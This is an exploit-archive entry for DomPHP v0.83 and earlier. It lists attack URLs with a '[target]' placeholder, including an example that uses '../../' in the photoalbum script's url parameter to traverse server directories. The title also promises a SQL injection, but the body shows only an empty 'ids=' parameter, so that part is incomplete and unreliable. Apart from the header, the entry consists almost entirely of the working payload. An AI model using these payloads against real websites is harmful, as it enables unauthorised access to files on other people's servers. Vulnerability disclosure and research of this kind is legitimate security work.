id: 21747
date: 01/12/2014
title: DomPHP <= v0.83 SQL injection / Local Directory Traversal Vulnerability
author: Houssamix
cves: 

-------------------------------------------------------------
DomPHP <= v0.83 Local Directory Traversal Vulnerability
-------------------------------------------------------------

= Author : Houssamix                      
= Script : DomPHP <= v0.83
                   
= Download : http://www.domphp.com/download/ 
           
= BUG :  Local Directory Traversal Vulnerability

= Exploit :

http://[target]/agenda/indexdate.php?ids=
                              
http://[target]/photoalbum/index.php?urlancien=&url=[Directory]
                
Exemple :
http://target.com/photoalbum/index.php?urlancien=&url=../../

#  0day.today [2023-03-23]  #